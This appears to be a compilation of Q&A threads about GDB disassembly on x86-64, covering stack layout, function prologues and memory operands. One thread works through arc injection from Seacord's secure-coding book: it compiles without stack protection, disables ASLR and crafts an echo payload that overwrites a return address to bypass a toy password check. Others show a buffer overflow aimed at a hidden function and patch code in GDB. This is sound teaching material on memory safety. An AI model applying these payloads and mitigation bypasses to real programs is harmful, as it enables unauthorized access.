I'm analyzing the disassembly of the following (very simple) C program in GDB on X86_64.
int main()
{
int a = 5;
int b = a + 6;
return 0;
}
I understand that in X86_64 the stack grows down. That is, the top of the stack has a lower address than the bottom of the stack. The assembly for the above program is as follows:
Dump of assembler code for function main:
0x0000000000400474 <+0>: push %rbp
0x0000000000400475 <+1>: mov %rsp,%rbp
0x0000000000400478 <+4>: movl $0x5,-0x8(%rbp)
0x000000000040047f <+11>: mov -0x8(%rbp),%eax
0x0000000000400482 <+14>: add $0x6,%eax
0x0000000000400485 <+17>: mov %eax,-0x4(%rbp)
0x0000000000400488 <+20>: mov $0x0,%eax
0x000000000040048d <+25>: leaveq
0x000000000040048e <+26>: retq
End of assembler dump.
I understand that:
We push the base pointer on the stack.
We then copy the value of the stack pointer to the base pointer.
We then copy the value 5 into the address -0x8(%rbp). Since an int is 4 bytes, shouldn't this be at the next address on the stack, which is -0x4(%rbp), rather than -0x8(%rbp)?
We then copy the value at the variable a into %eax, add 6 and then copy the value into the address at -0x4(%rbp).
Using this graphic for reference:
(source: thegreenplace.net)
it looks like the stack has the following contents:
|--------------|
| rbp | <-- %rbp
| 11 | <-- -0x4(%rbp)
| 5 | <-- -0x8(%rbp)
when I was expecting this:
|--------------|
| rbp | <-- %rbp
| 5 | <-- -0x4(%rbp)
| 11 | <-- -0x8(%rbp)
which seems to be the case in 7-understanding-c-by-learning-assembly where they show the assembly:
(gdb) disassemble
Dump of assembler code for function main:
0x0000000100000f50 <main+0>: push %rbp
0x0000000100000f51 <main+1>: mov %rsp,%rbp
0x0000000100000f54 <main+4>: mov $0x0,%eax
0x0000000100000f59 <main+9>: movl $0x0,-0x4(%rbp)
0x0000000100000f60 <main+16>: movl $0x5,-0x8(%rbp)
0x0000000100000f67 <main+23>: mov -0x8(%rbp),%ecx
0x0000000100000f6a <main+26>: add $0x6,%ecx
0x0000000100000f70 <main+32>: mov %ecx,-0xc(%rbp)
0x0000000100000f73 <main+35>: pop %rbp
0x0000000100000f74 <main+36>: retq
End of assembler dump.
Why is the value of b being put into a higher memory address in the stack than a, when a is clearly declared and initialized first?
The value of b is put on the stack wherever the compiler feels like it. You have no influence over it. And you shouldn't. It's possible that the order will change between minor versions of the compiler because some internal data structure was changed or some code rearranged. Some compilers will even randomize the layout of the stack on different compilations on purpose because it can make certain bugs harder to exploit.
In fact, the compiler might not use the stack at all. There's no need to. Here's the disassembly of the same program compiled with some optimizations enabled:
$ cat > foo.c
int main()
{
int a = 5;
int b = a + 6;
return 0;
}
$ cc -O -c foo.c
$ objdump -S foo.o
foo.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <main>:
0: 31 c0 xor %eax,%eax
2: c3 retq
$
With some simple optimizations the compiler figured out that you don't use the variable 'b', so there's no need to calculate it. And because of that you don't use the variable 'a' either, so there's no need to assign it. Only a compilation with no optimizations (or a very bad compiler) will put anything on the stack here. And even if you do use the values, basic optimizations will put them into registers, because touching the stack is expensive.
I'm new to security and am currently working through Robert Seacord's Secure Coding in C and C++. In chapter 2, the author talks about arc injection, wherein he transfers the flow of control in the following program from the isPasswordOK() routine to the else {puts("Access granted!");} branch in main() by overflowing the Password buffer in the gets() call with a tainted string: 1234567890123456j>*!
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stdlib.h>
bool isPasswordOK(void) {
char Password[12];
gets(Password);
return 0 == strcmp(Password, "goodpass");
}
int main(void) {
bool pwStatus;
puts("Enter Password: ");
pwStatus = isPasswordOK();
if (pwStatus == false) {
puts("Access denied");
exit(-1);
}
else {
puts("Access granted!");
}
}
Here, j = 0x6A, > = 0x10 (This is the Data Link Escape symbol), * = 0x2A and ! = 0x21
This sequence of 4 characters then corresponds to a 4-byte address, which I'm assuming is 0x6A102A21. This address, I think, points to the else line in the main() function, and we redirect control by overwriting the return address on the stack with the address of this line.
I'm trying to reproduce the same on my machine (x86-64 architecture). I've turned stack protection and randomization off, so I don't think that should be an issue. In fact, the program crashes as expected when I try to corrupt the return address. My problem is: how do I provide the tainted string as input to gets? If I disassemble main using gdb, I get the following output:
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400642 <+0>: push %rbp
0x0000000000400643 <+1>: mov %rsp,%rbp
0x0000000000400646 <+4>: sub $0x10,%rsp
0x000000000040064a <+8>: mov $0x40071d,%edi
0x000000000040064f <+13>: callq 0x4004c0 <puts@plt>
0x0000000000400654 <+18>: callq 0x400616 <isPasswordOK>
0x0000000000400659 <+23>: mov %al,-0x1(%rbp)
0x000000000040065c <+26>: movzbl -0x1(%rbp),%eax
0x0000000000400660 <+30>: xor $0x1,%eax
0x0000000000400663 <+33>: test %al,%al
0x0000000000400665 <+35>: je 0x40067b <main+57>
0x0000000000400667 <+37>: mov $0x40072e,%edi
0x000000000040066c <+42>: callq 0x4004c0 <puts@plt>
0x0000000000400671 <+47>: mov $0xffffffff,%edi
0x0000000000400676 <+52>: callq 0x400510 <exit@plt>
0x000000000040067b <+57>: mov $0x40073c,%edi
0x0000000000400680 <+62>: callq 0x4004c0 <puts@plt>
0x0000000000400685 <+67>: leaveq
0x0000000000400686 <+68>: retq
End of assembler dump.
Since I want to jump to the second puts() call, I think I need to provide 0x0000000000400680 as a part of my tainted string because this is the address of the second puts() according to the gdb disassembly.
How can I do this? In the book, the addresses were 4 bytes long, but here I have to deal with 8 bytes (16 hex digits). Also, there is no ASCII representation for 0x80, so what am I supposed to provide as input to gets? Basically, what I'm asking for are the characters that I should provide in place of the ????:
1234567890123456????
I'm utterly confused, so any help is appreciated, thanks!
I had the same problem and I will try to help you. The problem is that the string also depends heavily on the compiler, so I will explain how to get the string using my example.
My program looks like this (similar to yours):
isPasswordOk.cpp:
#include <iostream>
#include <cstdio>
#include <cstring>
bool isPasswordOk()
{
int result = 0xBBBBBBBB;
char password[10];
std::gets(password);
result = strcmp(password, "good") == 0;
return result;
}
int main()
{
bool pwStatus;
std::puts("Enter password:");
pwStatus = isPasswordOk();
if (pwStatus == false)
{
puts("Access denied!");
return -1;
}
puts("Access granted!");
return 0;
}
Then compile it like this:
g++ isPasswordOk.cpp -std=c++11 -fno-stack-protector -o isPasswordOk
The important part is -fno-stack-protector, so that no canaries are created. You can of course use another C++ standard, but my example does not compile with -std=c++14, because the gets function was removed.
Stack when calling isPasswordOk()
+-------------------------+ <--- stack pointer (rsp/esp)
| |
| password-buffer |
| |
| -------------------- |
| result | 0xBBBBBBBB
| --------------------- |
| (canary) | # when not disabled
+-------------------------+ <--- RBP
| Caller RBP frame ptr |
| --------------------- |
| Return Addr Caller |
+-------------------------+
Now use gdb to get the string to do the arc-injection.
gdb isPasswordOk
(gdb) run
Enter password:
AAAA
Access denied!
(gdb) disassemble isPasswordOk
Dump of assembler code for function _Z12isPasswordOkv:
0x0000555555554850 <+0>: push %rbp
0x0000555555554851 <+1>: mov %rsp,%rbp
0x0000555555554854 <+4>: sub $0x10,%rsp
0x0000555555554858 <+8>: movl $0xbbbbbbbb,-0x4(%rbp)
0x000055555555485f <+15>: lea -0x10(%rbp),%rax
0x0000555555554863 <+19>: mov %rax,%rdi
0x0000555555554866 <+22>: callq 0x555555554710
0x000055555555486b <+27>: lea -0x10(%rbp),%rax
0x000055555555486f <+31>: lea 0x14f(%rip),%rsi # 0x5555555549c5
0x0000555555554876 <+38>: mov %rax,%rdi
0x0000555555554879 <+41>: callq 0x555555554718
0x000055555555487e <+46>: test %eax,%eax
0x0000555555554880 <+48>: sete %al
0x0000555555554883 <+51>: movzbl %al,%eax
0x0000555555554886 <+54>: mov %eax,-0x4(%rbp)
0x0000555555554889 <+57>: cmpl $0x0,-0x4(%rbp)
0x000055555555488d <+61>: setne %al
0x0000555555554890 <+64>: leaveq
0x0000555555554891 <+65>: retq
End of assembler dump.
Now set some breakpoints
(gdb) break * 0x0000555555554858 # set breakpoint before gets
(gdb) break * 0x0000555555554879 # set breakpoint after gets
Now run it again (with the x command you can print the memory):
(gdb) run
Enter password:
AAAA
(gdb) x/12xw $rsp # rsp for 64 bit, esp for 32 bit
0x7fffffffde20: 0xffffde50 0x00007fff 0x55554720 0x00005555
0x7fffffffde30: 0xffffde50 0x00007fff 0x555548ab 0x00005555
0x7fffffffde40: 0xffffdf30 0x00007fff 0x00000000 0x00000000
(gdb) c
(gdb) x/12xw $rsp
0x7fffffffde20: 0x41414141 0x00007fff 0x55554720 0xBBBBBBBB # 0x41='A'
0x7fffffffde30: 0xffffde50 0x00007fff 0x555548ab 0x00005555
0x7fffffffde40: 0xffffdf00 0x00007fff 0x00000000 0x00000000
Access denied!
So the password was written at address 0x7fffffffde20: 0x41414141 = "AAAA".
The local variable result (0xBBBBBBBB) is placed after the buffer.
You can also see that the buffer internally occupies 12 bytes, although I defined it to be 10 bytes.
So to overwrite the Return Addr Caller (0x555548ab 0x00005555) I must write 0x20 (32) bytes: 16 bytes from the start of the buffer up to the saved RBP, 8 bytes for the saved RBP itself, and 8 bytes for the new return address.
First I have to know the address to jump to, so I use gdb again:
(gdb) disass main
Dump of assembler code for function main:
0x0000555555554892 <+0>: push %rbp
0x0000555555554893 <+1>: mov %rsp,%rbp
0x0000555555554896 <+4>: sub $0x10,%rsp
0x000055555555489a <+8>: lea 0x128(%rip),%rdi # 0x5555555549c9
0x00005555555548a1 <+15>: callq 0x5555555546f0
0x00005555555548a6 <+20>: callq 0x555555554850 <_Z12isPasswordOkv>
0x00005555555548ab <+25>: mov %al,-0x1(%rbp)
0x00005555555548ae <+28>: movzbl -0x1(%rbp),%eax
0x00005555555548b2 <+32>: xor $0x1,%eax
0x00005555555548b5 <+35>: test %al,%al
0x00005555555548b7 <+37>: je 0x5555555548cc <main+58>
0x00005555555548b9 <+39>: lea 0x119(%rip),%rdi # 0x5555555549d9
0x00005555555548c0 <+46>: callq 0x5555555546f0
0x00005555555548c5 <+51>: mov $0xffffffff,%eax
0x00005555555548ca <+56>: jmp 0x5555555548dd <main+75>
0x00005555555548cc <+58>: lea 0x115(%rip),%rdi # 0x5555555549e8
0x00005555555548d3 <+65>: callq 0x5555555546f0
0x00005555555548d8 <+70>: mov $0x0,%eax
0x00005555555548dd <+75>: leaveq
0x00005555555548de <+76>: retq
End of assembler dump.
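I want to jump to the address 0x00005555555548cc, so the string has to be created like this (filler bytes up to the return address, then the address with its least significant byte first, because x86-64 is little-endian):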
echo -ne 'AAAAAAAAAAAAAAAAAAAAAAAA\xcc\x48\x55\x55\x55\x55\x00\x00' > arcInjection.txt
Then you can call it by running:
(gdb) run < arcInjection.txt
Access granted!
If you want to run it outside gdb, you have to disable address space layout randomization (ASLR):
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Then you can also run it in the console:
./isPasswordOk < arcInjection.txt
Enter password:
Access granted!
ASLR is enabled again after a reboot, or if you afterwards run:
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
Hello, I have the following code:
#include <stdio.h>
#include <string.h>
#define SECRET "1234567890AZXCVBNFRT"
int checksecret(){
char buf[32];
gets(buf);
if(strcmp(SECRET,buf)==0) return 1;
else return 0;
}
void outsecret(){
printf("%s\n",SECRET);
}
int main(int argc, char** argv){
if (checksecret()){
outsecret();
};
}
Disassembly of outsecret:
(gdb) disassemble outsecret
Dump of assembler code for function outsecret:
0x00000000004005f4 <+0>: push %rbp
0x00000000004005f5 <+1>: mov %rsp,%rbp
0x00000000004005f8 <+4>: mov $0x4006b4,%edi
0x00000000004005fd <+9>: callq 0x400480 <puts@plt>
0x0000000000400602 <+14>: pop %rbp
0x0000000000400603 <+15>: retq
I assume that I don't know SECRET, so I try to run my program with the string produced by python -c 'print "A" * 32 + "\x40\x05\xf4"[::-1]'. But it fails with a segmentation fault. What am I doing wrong? Thank you for any help.
PS
I want to call function outsecret by overwriting return code in checksecret
You have to remember that all strings have an extra character that terminates the string, so if you input 32 characters then gets will write 33 characters to the buffer. Writing beyond the limits of an array leads to undefined behavior, which often leads to crashes.
The gets function has no bounds checking and is very dangerous to use. It has long been deprecated, and in the C11 standard it has been removed altogether.
$ python -c 'print "A" * 32 + "\x40\x05\xf4"[::-1]'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@
$ perl -le 'print length("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@")'
33
Your input string is too long for a buffer of 32 characters (an extra one is needed for the terminating '\0' null character). You are a victim of a buffer or array overflow (sometimes also called an array overrun).
Note that gets() was deprecated in C99 and was eventually dropped from the C11 standard for security reasons.
I want to call function outsecret by overwriting return code in
checksecret
Beware, you are about to leave the relatively safe regions of the C Standard. This means that behaviour depends on the compiler, the compiler's version, optimization settings, ABI and so on (maybe including the current phase of the moon).
Under the x86 calling conventions, an integer return value is stored directly in the %eax register (assuming that you have an x86 or x86-64 CPU). The array buf, which is most likely located on the stack, is addressed by %rbp offsets within the current stack frame. Let's consult gdb's disassemble command:
$ gcc -O0 test.c
$ gdb -q a.out
(gdb) b checksecret
(gdb) r
Breakpoint 1, 0x0000000000400631 in checksecret ()
(gdb) disas
Dump of assembler code for function checksecret:
0x000000000040062d <+0>: push %rbp
0x000000000040062e <+1>: mov %rsp,%rbp
=> 0x0000000000400631 <+4>: sub $0x30,%rsp
0x0000000000400635 <+8>: mov %fs:0x28,%rax
0x000000000040063e <+17>: mov %rax,-0x8(%rbp)
0x0000000000400642 <+21>: xor %eax,%eax
0x0000000000400644 <+23>: lea -0x30(%rbp),%rax
0x0000000000400648 <+27>: mov %rax,%rdi
0x000000000040064b <+30>: callq 0x400530 <gets@plt>
0x0000000000400650 <+35>: lea -0x30(%rbp),%rax
0x0000000000400654 <+39>: mov %rax,%rsi
0x0000000000400657 <+42>: mov $0x400744,%edi
0x000000000040065c <+47>: callq 0x400510 <strcmp@plt>
0x0000000000400661 <+52>: test %eax,%eax
0x0000000000400663 <+54>: jne 0x40066c <checksecret+63>
0x0000000000400665 <+56>: mov $0x1,%eax
0x000000000040066a <+61>: jmp 0x400671 <checksecret+68>
0x000000000040066c <+63>: mov $0x0,%eax
0x0000000000400671 <+68>: mov -0x8(%rbp),%rdx
0x0000000000400675 <+72>: xor %fs:0x28,%rdx
0x000000000040067e <+81>: je 0x400685 <checksecret+88>
0x0000000000400680 <+83>: callq 0x4004f0 <__stack_chk_fail@plt>
0x0000000000400685 <+88>: leaveq
0x0000000000400686 <+89>: retq
There is no way to overwrite %eax directly from C code, but what you could do is overwrite a selected fragment of the code section. In your case, what you want is to replace:
0x000000000040066c <+63>: mov $0x0,%eax
with
0x000000000040066c <+63>: mov $0x1,%eax
This is easy to accomplish with gdb itself:
(gdb) x/2bx 0x40066c
0x40066c <checksecret+63>: 0xb8 0x00
(gdb) set {unsigned char}0x40066d = 1
Now let's confirm it:
(gdb) x/i 0x40066c
0x40066c <checksecret+63>: mov $0x1,%eax
From that point on, checksecret() returns 1 even if SECRET does not match. However, it wouldn't be so easy to do this through buf itself, as you would need to know (or guess somehow) the correct offset of the particular instruction in the code section.
The answers above are pretty clear and correct ways to exploit the buffer overflow vulnerability. But there is a different way to do the same thing without exploiting the vulnerability.
mince@rootlab tmp $ gcc test.c -o test
mince@rootlab tmp $ strings test
/lib64/ld-linux-x86-64.so.2
libc.so.6
gets
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-X
UH-X
[]A\A]A^A_
1234567890AZXCVBNFRT
;*3$
Look at the last two rows: you will see your secret key there.
A simple example that demonstrates my issue:
// test.c
#include <stdio.h>
int foo1(int i) {
i = i * 2;
return i;
}
void foo2(int i) {
printf("greetings from foo! i = %i", i);
}
int main() {
int i = 7;
foo1(i);
foo2(i);
return 0;
}
$ clang -o test -O0 -Wall -g test.c
Inside GDB I do the following and start the execution:
(gdb) b foo1
(gdb) b foo2
After reaching the first breakpoint, I disassemble:
(gdb) disassemble
Dump of assembler code for function foo1:
0x0000000000400530 <+0>: push %rbp
0x0000000000400531 <+1>: mov %rsp,%rbp
0x0000000000400534 <+4>: mov %edi,-0x4(%rbp)
=> 0x0000000000400537 <+7>: mov -0x4(%rbp),%edi
0x000000000040053a <+10>: shl $0x1,%edi
0x000000000040053d <+13>: mov %edi,-0x4(%rbp)
0x0000000000400540 <+16>: mov -0x4(%rbp),%eax
0x0000000000400543 <+19>: pop %rbp
0x0000000000400544 <+20>: retq
End of assembler dump.
I do the same after reaching the second breakpoint:
(gdb) disassemble
Dump of assembler code for function foo2:
0x0000000000400550 <+0>: push %rbp
0x0000000000400551 <+1>: mov %rsp,%rbp
0x0000000000400554 <+4>: sub $0x10,%rsp
0x0000000000400558 <+8>: lea 0x400644,%rax
0x0000000000400560 <+16>: mov %edi,-0x4(%rbp)
=> 0x0000000000400563 <+19>: mov -0x4(%rbp),%esi
0x0000000000400566 <+22>: mov %rax,%rdi
0x0000000000400569 <+25>: mov $0x0,%al
0x000000000040056b <+27>: callq 0x400410 <printf@plt>
0x0000000000400570 <+32>: mov %eax,-0x8(%rbp)
0x0000000000400573 <+35>: add $0x10,%rsp
0x0000000000400577 <+39>: pop %rbp
0x0000000000400578 <+40>: retq
End of assembler dump.
GDB obviously uses different offsets (+7 in foo1 and +19 in foo2), with respect to the beginning of the function, when setting the breakpoint. How can I determine this offset by myself without using GDB?
gdb uses a few methods to determine this information.
First, the very best way is if your compiler emits DWARF describing the function. Then gdb can decode the DWARF to find the end of the prologue.
However, this isn't always available. GCC emits it, but IIRC only when optimization is used.
I believe there's also a convention that if the first line number of a function is repeated in the line table, then the address of the second instance is used as the end of the prologue. That is if the lines look like:
< function f >
line 23 0xffff0000
line 23 0xffff0010
Then gdb will assume that the function f's prologue is complete at 0xffff0010.
I think this is the mode used by gcc when not optimizing.
Finally gdb has some prologue decoders that know how common prologues are written on many platforms. These are used when debuginfo isn't available, though offhand I don't recall what the purpose of that is.
As others mentioned, even without debugging symbols GDB has a function prologue decoder, i.e. heuristic magic.
To disable that, you can add an asterisk before the function name:
break *func
On Binutils 2.25 the skip algorithm seems to be at: symtab.c:skip_prologue_sal, which breakpoints.c:break_command, the command definition, calls indirectly.
The prologue is a common "boilerplate" used at the start of function calls.
The prologue of foo2 is longer than that of foo1 by two instructions:
sub $0x10,%rsp
foo2 calls another function, so it is not a leaf function. This prevents some optimizations; in particular, it must decrement rsp before the call to reserve room for its local state.
Leaf functions don't need that because of the 128 byte ABI red zone, see also: Why does the x86-64 GCC function prologue allocate less stack than the local variables?
foo1 however is a leaf function.
lea 0x400644,%rax
For some reason, clang stores the address of local string constants (stored in .rodata) in registers as part of the function prologue.
We know that rax contains "greetings from foo! i = %i" because it is then passed to %rdi, the first argument of printf.
foo1, however, does not have local string constants.
The other instructions of the prologue are common to both functions:
rbp manipulation is discussed at: What is the purpose of the EBP frame pointer register?
mov %edi,-0x4(%rbp) stores the first argument on the stack. This is not required in leaf functions, but clang does it anyway. It makes register allocation easier.
On ELF platforms like Linux, debug information is stored in a separate (non-executable) section in the executable. This separate section holds all the information that the debugger needs. Check the DWARF2 specification for the specifics.
For example, in the following code, "justatest" and the format "%s" are defined in the heap:
char str[15]="justatest";
int main(){
printf("%s",str);
return 0;
}
In GDB, I got the following assembly code before the call to printf:
=> 0x0804841f <+14>: movl $0x804a020,0x4(%esp)
0x08048427 <+22>: movl $0x80484d8,(%esp)
0x0804842e <+29>: call 0x80482f0 <printf@plt>
Do I have to examine the parameters one by one using "x/s 0x804a020" and "x/s 0x80484d8",
or is there a table of constants defined in the heap that I can refer to directly?
Thanks!
Your understanding that str resides on the heap is not correct. It is a global variable, which is stored in the data segment. To print the global variable, you can do the following (shown on my GNU/Linux terminal):
$ gcc -g -Wall hello.c
$ gdb -q ./a.out
Reading symbols from /home/mantosh/practice/a.out...done.
(gdb) break main
Breakpoint 1 at 0x400524: file hello.c, line 6.
(gdb) run
Starting program: /home/mantosh/practice/a.out
Breakpoint 1, main () at bakwas.c:6
6 printf("%s",str);
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400520 <+0>: push %rbp
0x0000000000400521 <+1>: mov %rsp,%rbp
=> 0x0000000000400524 <+4>: mov $0x601020,%esi
0x0000000000400529 <+9>: mov $0x4005e4,%edi
0x000000000040052e <+14>: mov $0x0,%eax
0x0000000000400533 <+19>: callq 0x4003f0 <printf@plt>
0x0000000000400538 <+24>: mov $0x0,%eax
0x000000000040053d <+29>: pop %rbp
0x000000000040053e <+30>: retq
End of assembler dump.
(gdb) p str
$1 = "justatest\000\000\000\000\000"
(gdb) p &str
$2 = (char (*)[15]) 0x601020
// These are addresses of two arguments which would be passed in printf.
// From assembly instruction we can verify that before calling the printf
// these are getting stored into the registers.
(gdb) x/s 0x4005e4
0x4005e4: "%s"
(gdb) x/s 0x601020
0x601020 <str>: "justatest"
Later I found that, for object files without a debugging symbol table,
objdump -t obj
lists most of the symbols of global variables and functions along with their addresses, and
objdump -D obj (instead of -d)
includes all sections, such as .text/.data/.rodata, instead of .text only.
These two combined provide sufficient access to what I mentioned above, such as switch tables, constant strings and global variables.
I am currently working with gdb disassembly to understand C programs in more detail, so I wrote this C program:
#include <stdio.h>
void swap(int a, int b){
int temp = a;
a = b;
b = temp;
}
void main(){
int a = 1,b = 2;
swap(a, b);
}
I use gdb and run disass /m main to get this:
(gdb) disass /m main
Dump of assembler code for function main:
8 void main(){
0x0000000000400492 <+0>: push %rbp
0x0000000000400493 <+1>: mov %rsp,%rbp
0x0000000000400496 <+4>: sub $0x10,%rsp
9 int a = 1,b = 2;
0x000000000040049a <+8>: movl $0x1,-0x8(%rbp)
0x00000000004004a1 <+15>: movl $0x2,-0x4(%rbp)
10 swap(a, b);
0x00000000004004a8 <+22>: mov -0x4(%rbp),%edx
0x00000000004004ab <+25>: mov -0x8(%rbp),%eax
0x00000000004004ae <+28>: mov %edx,%esi
0x00000000004004b0 <+30>: mov %eax,%edi
0x00000000004004b2 <+32>: callq 0x400474 <swap>
11 }
0x00000000004004b7 <+37>: leaveq
0x00000000004004b8 <+38>: retq
End of assembler dump.
My question is: what does -0x8(%rbp) mean? Is it memory or a register?
I do know that 1 is stored in -0x8(%rbp) and 2 in -0x4(%rbp). How can I show the value in these kinds of places?
I tried (gdb) p -0x8(%rbp) but got this:
A syntax error in expression, near `%rbp)'.
Registers in gdb can be referred to with the prefix '$':
p *(int *)($rbp - 8)
RBP and RSP most likely refer to memory locations, specifically on the stack. Other registers are more or less general-purpose registers and can point to memory too.
It means "the data stored when you subtract eight from the address stored in rbp". Try looking at the stack commands available in gdb: http://www.delorie.com/gnu/docs/gdb/gdb_41.html
The actual meaning of constructs such as -0x8(%rbp) depends on the architecture (or the assembly language). But in this case, -0x8(%rbp) is a memory operand: its address is the value of %rbp minus 8.
In gdb, you can print the value at that memory address by doing something like
info r rbp
p *(int *)(value_of_rbp - 8)